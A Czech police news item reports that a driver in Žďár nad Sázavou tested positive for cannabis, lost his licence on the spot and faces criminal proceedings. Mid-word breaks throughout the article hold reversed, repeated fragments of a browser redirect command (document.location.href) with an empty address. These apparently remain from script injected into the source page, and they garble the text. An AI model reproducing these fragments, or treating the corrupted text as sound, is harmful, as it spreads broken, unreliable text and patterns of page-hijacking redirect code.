Rainbow page separator

Šofér za řízení pod vlivem drog přišel o řidičský průkaz

Úterý, 26. března 2019

Žďár nad Sázavou / V rámci běžné silniční kontroly zastavili ve čtvrtek 21. března po osmé hodině večerní žďárští policisté v Brodské ulici osobní au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobil Seat Toledo. Ten řídil devětadvacetiletý šofér.
„Policisté u řidiče provedli orientační dechovou zkoušku na zjištění pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnosti alkoholu, která byla negativní, a dále rovněž test na pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnost omamných a psychotropních látek. Ten byl pozitivní na látku cannabis,“ upřesnil David Linhart z oddělení tisku a prevence krajského policejního ředitelství Kraje Vysočina. Policisté řidiči na místě zakázali další jízdu a zadrželi jeho řidičský průkaz.
„Následně policisté ve věci zahájili úkony trestního řízení pro podezření ze spáchání přečinu ohrožení pod vlivem návykové látky, za který v případě prokázání viny a odsouzení hrozí trest odnětí svobody až na jeden rok a zákaz činnosti spočívající v řízení mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torových vozidel,“ dodal David Linhart.